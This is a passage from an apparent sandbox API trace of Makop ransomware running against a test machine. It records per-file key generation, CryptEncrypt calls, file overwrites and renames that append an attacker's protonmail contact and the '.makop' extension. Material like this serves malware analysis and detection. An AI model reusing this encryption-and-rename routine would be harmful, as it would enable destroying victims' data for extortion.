hTemplateFile=0x0) returned 0xac [0127.559] GetProcessHeap () returned 0x550000 [0127.559] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x10) returned 0x566008 [0127.559] CryptGenRandom (in: hProv=0x564928, dwLen=0x10, pbBuffer=0x566008 | out: pbBuffer=0x566008) returned 1 [0127.559] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x245fcb0 | out: lpNewFilePointer=0x0) returned 1 [0127.559] CryptImportKey (in: hProv=0x564928, pbData=0x56ca58, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x245fc94 | out: phKey=0x245fc94*=0x56c880) returned 1 [0127.559] CryptSetKeyParam (hKey=0x56c880, dwParam=0x1, pbData=0x566008, dwFlags=0x0) returned 1 [0127.559] GetProcessHeap () returned 0x550000 [0127.559] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x40) returned 0x566d90 [0127.559] CryptEncrypt (in: hKey=0x56c880, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x566d90*, pdwDataLen=0x245fc78*=0x40, dwBufLen=0x40 | out: pbData=0x566d90*, pdwDataLen=0x245fc78*=0x40) returned 1 [0127.559] CryptDestroyKey (hKey=0x56c880) returned 1 [0127.559] WriteFile (in: hFile=0xac, lpBuffer=0x566d90*, nNumberOfBytesToWrite=0x40, lpNumberOfBytesWritten=0x245fc90, lpOverlapped=0x0 | out: lpBuffer=0x566d90*, lpNumberOfBytesWritten=0x245fc90*=0x40, lpOverlapped=0x0) returned 1 [0127.560] WriteFile (in: hFile=0xac, lpBuffer=0x245fc98*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x245fc90, lpOverlapped=0x0 | out: lpBuffer=0x245fc98*, lpNumberOfBytesWritten=0x245fc90*=0x4, lpOverlapped=0x0) returned 1 [0127.560] WriteFile (in: hFile=0xac, lpBuffer=0x566008*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x245fc90, lpOverlapped=0x0 | out: lpBuffer=0x566008*, lpNumberOfBytesWritten=0x245fc90*=0x10, lpOverlapped=0x0) returned 1 [0127.560] WriteFile (in: hFile=0xac, lpBuffer=0x569940*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x245fc90, lpOverlapped=0x0 | out: lpBuffer=0x569940*, lpNumberOfBytesWritten=0x245fc90*=0x80, lpOverlapped=0x0) returned 1 [0127.560] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x245fcb8 | out: lpNewFilePointer=0x0) returned 1 [0127.561] WriteFile (in: hFile=0xac, lpBuffer=0x245fca8*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x245fc90, lpOverlapped=0x0 | out: lpBuffer=0x245fca8*, lpNumberOfBytesWritten=0x245fc90*=0x8, lpOverlapped=0x0) returned 1 [0127.561] CryptImportKey (in: hProv=0x564928, pbData=0x56ca58, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x245fc94 | out: phKey=0x245fc94*=0x56c880) returned 1 [0127.561] CryptSetKeyParam (hKey=0x56c880, dwParam=0x1, pbData=0x566008, dwFlags=0x0) returned 1 [0127.561] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0127.561] ReadFile (in: hFile=0xac, lpBuffer=0x2250020, nNumberOfBytesToRead=0xcb10, lpNumberOfBytesRead=0x245fc9c, lpOverlapped=0x0 | out: lpBuffer=0x2250020*, lpNumberOfBytesRead=0x245fc9c*=0xcb10, lpOverlapped=0x0) returned 1 [0127.561] CryptEncrypt (in: hKey=0x56c880, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2250020*, pdwDataLen=0x245fc78*=0xcb10, dwBufLen=0xcb10 | out: pbData=0x2250020*, pdwDataLen=0x245fc78*=0xcb10) returned 1 [0127.562] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0127.562] WriteFile (in: hFile=0xac, lpBuffer=0x2250020*, nNumberOfBytesToWrite=0xcb10, lpNumberOfBytesWritten=0x245fc90, lpOverlapped=0x0 | out: lpBuffer=0x2250020*, lpNumberOfBytesWritten=0x245fc90*=0xcb10, lpOverlapped=0x0) returned 1 [0127.562] CryptDestroyKey (hKey=0x56c880) returned 1 [0127.562] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0xcbe4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0127.562] SetEndOfFile (hFile=0xac) returned 1 [0127.566] GetProcessHeap () returned 0x550000 [0127.566] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x566d90 | out: hHeap=0x550000) returned 1 [0127.566] GetProcessHeap () returned 0x550000 [0127.566] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x566008 | out: hHeap=0x550000) returned 1 [0127.566] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7T2oGF7zDJqV.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\7t2ogf7zdjqv.swf"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7T2oGF7zDJqV.swf.[4B2E4630].[akzhq530@protonmail.com].makop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\7t2ogf7zdjqv.swf.[4b2e4630].[akzhq530@protonmail.com].makop")) returned 1 [0127.584] CloseHandle (hObject=0xac) returned 1 [0127.584] FindNextFileW (in: hFindFile=0x5699c8, lpFindFileData=0x245fd20 | out: lpFindFileData=0x245fd20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfec73c30, ftCreationTime.dwHighDateTime=0x1d5e0b5, ftLastAccessTime.dwLowDateTime=0x954968a0, ftLastAccessTime.dwHighDateTime=0x1d5dee9, ftLastWriteTime.dwLowDateTime=0x954968a0, ftLastWriteTime.dwHighDateTime=0x1d5dee9, nFileSizeHigh=0x0, nFileSizeLow=0x5749, dwReserved0=0x0, dwReserved1=0xffff, cFileName="BnF6MssAaesFqMceXb.gif", cAlternateFileName="BNF6MS~1.GIF")) returned 1 [0127.584] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\BnF6MssAaesFqMceXb.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\bnf6mssaaesfqmcexb.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xac [0127.585] GetProcessHeap () returned 0x550000 [0127.585] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x10) returned 0x566008 [0127.585] CryptGenRandom (in: hProv=0x564928, dwLen=0x10, pbBuffer=0x566008 | out: pbBuffer=0x566008) returned 1 [0127.585] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x245fcb0 | out: lpNewFilePointer=0x0) returned 1 [0127.585] WriteFile (in: hFile=0xac, lpBuffer=0x245fcc0*, nNumberOfBytesToWrite=0x7, lpNumberOfBytesWritten=0x245fc90, lpOverlapped=0x0 | out: lpBuffer=0x245fcc0*, lpNumberOfBytesWritten=0x245fc90*=0x7, lpOverlapped=0x0) returned 1 [0127.586] CryptImportKey (in: hProv=0x564928, pbData=0x56cba8, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x245fc94 | out: phKey=0x245fc94*=0x56c880) returned 1 [0127.586] CryptSetKeyParam (hKey=0x56c880, dwParam=0x1, pbData=0x566008, dwFlags=0x0) returned 1 [0127.586] GetProcessHeap () returned 0x550000 [0127.586] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x50) returned 0x56d278 [0127.586] CryptEncrypt (in: hKey=0x56c880, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x56d278*, pdwDataLen=0x245fc78*=0x50, dwBufLen=0x50 | out: pbData=0x56d278*, pdwDataLen=0x245fc78*=0x50) returned 1 [0127.587] CryptDestroyKey (hKey=0x56c880) returned 1 [0127.587] WriteFile (in: hFile=0xac, lpBuffer=0x56d278*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x245fc90, lpOverlapped=0x0 | out: lpBuffer=0x56d278*, lpNumberOfBytesWritten=0x245fc90*=0x50, lpOverlapped=0x0) returned 1 [0127.587] WriteFile (in: hFile=0xac, lpBuffer=0x245fc98*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x245fc90, lpOverlapped=0x0 | out: lpBuffer=0x245fc98*, lpNumberOfBytesWritten=0x245fc90*=0x4, lpOverlapped=0x0) returned 1 [0127.587] WriteFile (in: hFile=0xac, lpBuffer=0x566008*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x245fc90, lpOverlapped=0x0 | out: lpBuffer=0x566008*, lpNumberOfBytesWritten=0x245fc90*=0x10, lpOverlapped=0x0) returned 1 [0127.587] WriteFile (in: hFile=0xac, lpBuffer=0x56c928*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x245fc90, lpOverlapped=0x0 | out: lpBuffer=0x56c928*, lpNumberOfBytesWritten=0x245fc90*=0x80, lpOverlapped=0x0) returned 1 [0127.587] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x245fcb8 | out: lpNewFilePointer=0x0) returned 1 [0127.587] WriteFile (in: hFile=0xac, lpBuffer=0x245fca8*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x245fc90, lpOverlapped=0x0 | out: lpBuffer=0x245fca8*, lpNumberOfBytesWritten=0x245fc90*=0x8, lpOverlapped=0x0) returned 1 [0127.587] CryptImportKey (in: hProv=0x564928, pbData=0x56cba8, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x245fc94 | out: phKey=0x245fc94*=0x56c880) returned 1 [0127.587] CryptSetKeyParam (hKey=0x56c880, dwParam=0x1, pbData=0x566008, dwFlags=0x0) returned 1 [0127.587] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0127.587] ReadFile (in: hFile=0xac, lpBuffer=0x2250020, nNumberOfBytesToRead=0x5749, lpNumberOfBytesRead=0x245fc9c, lpOverlapped=0x0 | out: lpBuffer=0x2250020*, lpNumberOfBytesRead=0x245fc9c*=0x5749, lpOverlapped=0x0) returned 1 [0127.588] CryptEncrypt (in: hKey=0x56c880, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2250020*, pdwDataLen=0x245fc78*=0x5750, dwBufLen=0x5750 | out: pbData=0x2250020*, pdwDataLen=0x245fc78*=0x5750) returned 1 [0127.588] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0127.588] WriteFile (in: hFile=0xac, lpBuffer=0x2250020*, nNumberOfBytesToWrite=0x5750, lpNumberOfBytesWritten=0x245fc90, lpOverlapped=0x0 | out: lpBuffer=0x2250020*, lpNumberOfBytesWritten=0x245fc90*=0x5750, lpOverlapped=0x0) returned 1 [0127.588] CryptDestroyKey (hKey=0x56c880) returned 1 [0127.588] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x5834, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0127.588] SetEndOfFile (hFile=0xac) returned 1 [0127.591] GetProcessHeap () returned 0x550000 [0127.591] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x56d278 | out: hHeap=0x550000) returned 1 [0127.591] GetProcessHeap () returned 0x550000 [0127.591] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x566008 | out: hHeap=0x550000) returned 1 [0127.591] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\BnF6MssAaesFqMceXb.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\bnf6mssaaesfqmcexb.gif"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\BnF6MssAaesFqMceXb.gif.[4B2E4630].[akzhq530@protonmail.com].makop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\bnf6mssaaesfqmcexb.gif.[4b2e4630].[akzhq530@protonmail.com].makop")) returned 1 [0127.598] CloseHandle (hObject=0xac) returned 1 [0127.598] FindNextFileW (in: hFindFile=0x5699c8, lpFindFileData=0x245fd20 | out: lpFindFileData=0x245fd20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcc1cc040, ftCreationTime.dwHighDateTime=0x1d5df7d, ftLastAccessTime.dwLowDateTime=0x7af5dfb0, ftLastAccessTime.dwHighDateTime=0x1d5dad9, ftLastWriteTime.dwLowDateTime=0x7af5dfb0, ftLastWriteTime.dwHighDateTime=0x1d5dad9, nFileSizeHigh=0x0, nFileSizeLow=0x11598, dwReserved0=0x0, dwReserved1=0xffff, cFileName="bwlb6X 73G09qL.bmp", cAlternateFileName="BWLB6X~1.BMP")) returned 1 [0127.598] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bwlb6X 73G09qL.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\bwlb6x 73g09ql.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xac [0127.598] GetProcessHeap () returned 0x550000 [0127.598] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x10) returned 0x566008 [0127.598] CryptGenRandom (in: hProv=0x564928, dwLen=0x10, pbBuffer=0x566008 | out: pbBuffer=0x566008) returned 1 [0127.598] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x245fcb0 | out: lpNewFilePointer=0x0) returned 1 [0127.598] WriteFile (in: hFile=0xac, lpBuffer=0x245fcc0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x245fc90, lpOverlapped=0x0 | out: lpBuffer=0x245fcc0*, lpNumberOfBytesWritten=0x245fc90*=0x8, lpOverlapped=0x0) returned 1 [0127.599] CryptImportKey (in: hProv=0x564928, pbData=0x56ca58, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x245fc94 | out: phKey=0x245fc94*=0x56c880) returned 1 [0127.599] CryptSetKeyParam (hKey=0x56c880, dwParam=0x1, pbData=0x566008, dwFlags=0x0) returned 1 [0127.599] GetProcessHeap () returned 0x550000 [0127.599] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x40) returned 0x566d90 [0127.599] CryptEncrypt (in: hKey=0x56c880, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x566d90*, pdwDataLen=0x245fc78*=0x40, dwBufLen=0x40 | out: pbData=0x566d90*, pdwDataLen=0x245fc78*=0x40) returned 1 [0127.599] CryptDestroyKey (hKey=0x56c880) returned 1 [0127.600] WriteFile (in: hFile=0xac, lpBuffer=0x566d90*, nNumberOfBytesToWrite=0x40, lpNumberOfBytesWritten=0x245fc90, lpOverlapped=0x0 | out: lpBuffer=0x566d90*, lpNumberOfBytesWritten=0x245fc90*=0x40, lpOverlapped=0x0) returned 1 [0127.600] WriteFile (in: hFile=0xac, lpBuffer=0x245fc98*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x245fc90, lpOverlapped=0x0 | out: lpBuffer=0x245fc98*, lpNumberOfBytesWritten=0x245fc90*=0x4, lpOverlapped=0x0) returned 1 [0127.600] WriteFile (in: hFile=0xac, lpBuffer=0x566008*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x245fc90, lpOverlapped=0x0 | out: lpBuffer=0x566008*, lpNumberOfBytesWritten=0x245fc90*=0x10, lpOverlapped=0x0) returned 1 [0127.600] WriteFile (in: hFile=0xac, lpBuffer=0x569940*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x245fc90, lpOverlapped=0x0 | out: lpBuffer=0x569940*, lpNumberOfBytesWritten=0x245fc90*=0x80, lpOverlapped=0x0) returned 1 [0127.600] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x245fcb8 | out: lpNewFilePointer=0x0) returned 1 [0127.600] WriteFile (in: hFile=0xac, lpBuffer=0x245fca8*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x245fc90, lpOverlapped=0x0 | out: lpBuffer=0x245fca8*, lpNumberOfBytesWritten=0x245fc90*=0x8, lpOverlapped=0x0) returned 1 [0127.600] CryptImportKey (in: hProv=0x564928, pbData=0x56ca58, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x245fc94 | out: phKey=0x245fc94*=0x56c880) returned 1 [0127.600] CryptSetKeyParam (hKey=0x56c880, dwParam=0x1, pbData=0x566008, dwFlags=0x0) returned 1 [0127.600] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0127.600] ReadFile (in: hFile=0xac, lpBuffer=0x2250020, nNumberOfBytesToRead=0x11598, lpNumberOfBytesRead=0x245fc9c, lpOverlapped=0x0 | out: lpBuffer=0x2250020*, lpNumberOfBytesRead=0x245fc9c*=0x11598, lpOverlapped=0x0) returned 1 [0127.601] CryptEncrypt (in: hKey=0x56c880, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2250020*, pdwDataLen=0x245fc78*=0x115a0, dwBufLen=0x115a0 | out: pbData=0x2250020*, pdwDataLen=0x245fc78*=0x115a0) returned 1 [0127.637] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0127.637] WriteFile (in: hFile=0xac, lpBuffer=0x2250020*, nNumberOfBytesToWrite=0x115a0, lpNumberOfBytesWritten=0x245fc90, lpOverlapped=0x0 | out: lpBuffer=0x2250020*, lpNumberOfBytesWritten=0x245fc90*=0x115a0, lpOverlapped=0x0) returned 1 [0127.638] CryptDestroyKey (hKey=0x56c880) returned 1 [0127.638] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x11674, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0127.638] SetEndOfFile (hFile=0xac) returned 1 [0127.640] GetProcessHeap () returned 0x550000 [0127.640] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x566d90 | out: hHeap=0x550000) returned 1 [0127.640] GetProcessHeap () returned 0x550000 [0127.640] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x566008 | out: hHeap=0x550000) returned 1 [0127.641] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bwlb6X 73G09qL.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\bwlb6x 73g09ql.bmp"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bwlb6X 73G09qL.bmp.[4B2E4630].[akzhq530@protonmail.com].makop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\bwlb6x 73g09ql.bmp.[4b2e4630].[akzhq530@protonmail.com].makop")) returned 1 [0127.655] CloseHandle (hObject=0xac) returned 1 [0127.655] FindNextFileW (in: hFindFile=0x5699c8, lpFindFileData=0x245fd20 | out: lpFindFileData=0x245fd20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x844422d0, ftCreationTime.dwHighDateTime=0x1d5e1d1, ftLastAccessTime.dwLowDateTime=0xd0604680, ftLastAccessTime.dwHighDateTime=0x1d5da10, ftLastWriteTime.dwLowDateTime=0xd0604680, ftLastWriteTime.dwHighDateTime=0x1d5da10, nFileSizeHigh=0x0, nFileSizeLow=0x1e6b, dwReserved0=0x0, dwReserved1=0xffff, cFileName="bYZUM_ MtRGyrHjr5j0.avi", cAlternateFileName="BYZUM_~1.AVI")) returned 1 [0127.655] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bYZUM_ MtRGyrHjr5j0.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\byzum_ mtrgyrhjr5j0.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xac [0127.655] GetProcessHeap () returned 0x550000 [0127.655] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x10) returned 0x566008 [0127.655] CryptGenRandom (in: hProv=0x564928, dwLen=0x10, pbBuffer=0x566008 | out: pbBuffer=0x566008) returned 1 [0127.655] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x245fcb0 | out: lpNewFilePointer=0x0) returned 1 [0127.655] WriteFile (in: hFile=0xac, lpBuffer=0x245fcc0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x245fc90, lpOverlapped=0x0 | out: lpBuffer=0x245fcc0*, lpNumberOfBytesWritten=0x245fc90*=0x5, lpOverlapped=0x0) returned 1 [0127.656] CryptImportKey (in: hProv=0x564928, pbData=0x56cba8, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x245fc94 | out: phKey=0x245fc94*=0x56c880) returned 1 [0127.656] CryptSetKeyParam (hKey=0x56c880, dwParam=0x1, pbData=0x566008, dwFlags=0x0) returned 1 [0127.656] GetProcessHeap () returned 0x550000 [0127.656] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x50) returned 0x56d278 [0127.656] CryptEncrypt (in: hKey=0x56c880, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x56d278*, pdwDataLen=0x245fc78*=0x50, dwBufLen=0x50 | out: pbData=0x56d278*, pdwDataLen=0x245fc78*=0x50) returned 1 [0127.656] CryptDestroyKey (hKey=0x56c880) returned 1 [0127.656] WriteFile (in: hFile=0xac, lpBuffer=0x56d278*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x245fc90, lpOverlapped=0x0 | out: lpBuffer=0x56d278*, lpNumberOfBytesWritten=0x245fc90*=0x50, lpOverlapped=0x0) returned 1 [0127.656] WriteFile (in: hFile=0xac, lpBuffer=0x245fc98*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x245fc90, lpOverlapped=0x0 | out: lpBuffer=0x245fc98*, lpNumberOfBytesWritten=0x245fc90*=0x4, lpOverlapped=0x0) returned 1 [0127.656] WriteFile (in: hFile=0xac, lpBuffer=0x566008*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x245fc90, lpOverlapped=0x0 | out: lpBuffer=0x566008*, lpNumberOfBytesWritten=0x245fc90*=0x10, lpOverlapped=0x0) returned 1 [0127.657] WriteFile (in: hFile=0xac, lpBuffer=0x56c928*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x245fc90, lpOverlapped=0x0 | out: lpBuffer=0x56c928*, lpNumberOfBytesWritten=0x245fc90*=0x80, lpOverlapped=0x0) returned 1 [0127.657] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x245fcb8 | out: lpNewFilePointer=0x0) returned 1 [0127.657] WriteFile (in: hFile=0xac, lpBuffer=0x245fca8*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x245fc90, lpOverlapped=0x0 | out: lpBuffer=0x245fca8*, lpNumberOfBytesWritten=0x245fc90*=0x8, lpOverlapped=0x0) returned 1 [0127.657] CryptImportKey (in: hProv=0x564928, pbData=0x56cba8, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x245fc94 | out: phKey=0x245fc94*=0x56c880) returned 1 [0127.657] CryptSetKeyParam (hKey=0x56c880, dwParam=0x1, pbData=0x566008, dwFlags=0x0) returned 1 [0127.657] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0127.657] ReadFile (in: hFile=0xac, lpBuffer=0x2250020, nNumberOfBytesToRead=0x1e6b, lpNumberOfBytesRead=0x245fc9c, lpOverlapped=0x0 | out: lpBuffer=0x2250020*, lpNumberOfBytesRead=0x245fc9c*=0x1e6b, lpOverlapped=0x0) returned 1 [0127.657] CryptEncrypt (in: hKey=0x56c880, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2250020*, pdwDataLen=0x245fc78*=0x1e70, dwBufLen=0x1e70 | out: pbData=0x2250020*, pdwDataLen=0x245fc78*=0x1e70) returned 1 [0127.657] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0127.657] WriteFile (in: hFile=0xac, lpBuffer=0x2250020*, nNumberOfBytesToWrite=0x1e70, lpNumberOfBytesWritten=0x245fc90, lpOverlapped=0x0 | out: lpBuffer=0x2250020*, lpNumberOfBytesWritten=0x245fc90*=0x1e70, lpOverlapped=0x0) returned 1 [0127.657] CryptDestroyKey (hKey=0x56c880) returned 1 [0127.657] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x1f54, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0127.657] SetEndOfFile (hFile=0xac) returned 1 [0127.659] GetProcessHeap () returned 0x550000 [0127.660] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x56d278 | out: hHeap=0x550000) returned 1 [0127.660] GetProcessHeap () returned 0x550000 [0127.660] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x566008 | out: hHeap=0x550000) returned 1 [0127.660] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bYZUM_ MtRGyrHjr5j0.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\byzum_ mtrgyrhjr5j0.avi"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bYZUM_ MtRGyrHjr5j0.avi.[4B2E4630].[akzhq530@protonmail.com].makop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\byzum_ mtrgyrhjr5j0.avi.[4b2e4630].[akzhq530@protonmail.com].makop")) returned 1 [0127.664] CloseHandle (hObject=0xac) returned 1 [0127.665] FindNextFileW (in: hFindFile=0x5699c8, lpFindFileData=0x245fd20 | out: lpFindFileData=0x245fd20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc6ba2890, ftCreationTime.dwHighDateTime=0x1d5e3f1, ftLastAccessTime.dwLowDateTime=0xf6a83440, ftLastAccessTime.dwHighDateTime=0x1d5e7f5, ftLastWriteTime.dwLowDateTime=0xf6a83440, ftLastWriteTime.dwHighDateTime=0x1d5e7f5, nFileSizeHigh=0x0, nFileSizeLow=0xb5df, dwReserved0=0x0, dwReserved1=0xffff, cFileName="cQBScsTrcR2uGzhoPg.xlsx", cAlternateFileName="CQBSCS~1.XLS")) returned 1 [0127.665] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\cQBScsTrcR2uGzhoPg.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\cqbscstrcr2ugzhopg.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xac [0127.665] GetProcessHeap () returned 0x550000 [0127.665] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x10) returned 0x566008 [0127.665] CryptGenRandom (in: hProv=0x564928, dwLen=0x10, pbBuffer=0x566008 | out: pbBuffer=0x566008) returned 1 [0127.665] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x245fcb0 | out: lpNewFilePointer=0x0) returned 1 [0127.665] WriteFile (in: hFile=0xac, lpBuffer=0x245fcc0*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x245fc90, lpOverlapped=0x0 | out: lpBuffer=0x245fcc0*, lpNumberOfBytesWritten=0x245fc90*=0x1, lpOverlapped=0x0) returned 1 [0127.666] CryptImportKey (in: hProv=0x564928, pbData=0x56ca58, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x245fc94 | out: phKey=0x245fc94*=0x56c880) returned 1 [0127.666] CryptSetKeyParam (hKey=0x56c880, dwParam=0x1, pbData=0x566008, dwFlags=0x0) returned 1 [0127.666] GetProcessHeap () returned 0x550000 [0127.666] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x50) returned 0x56d278 [0127.666] CryptEncrypt (in: hKey=0x56c880, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x56d278*, pdwDataLen=0x245fc78*=0x50, 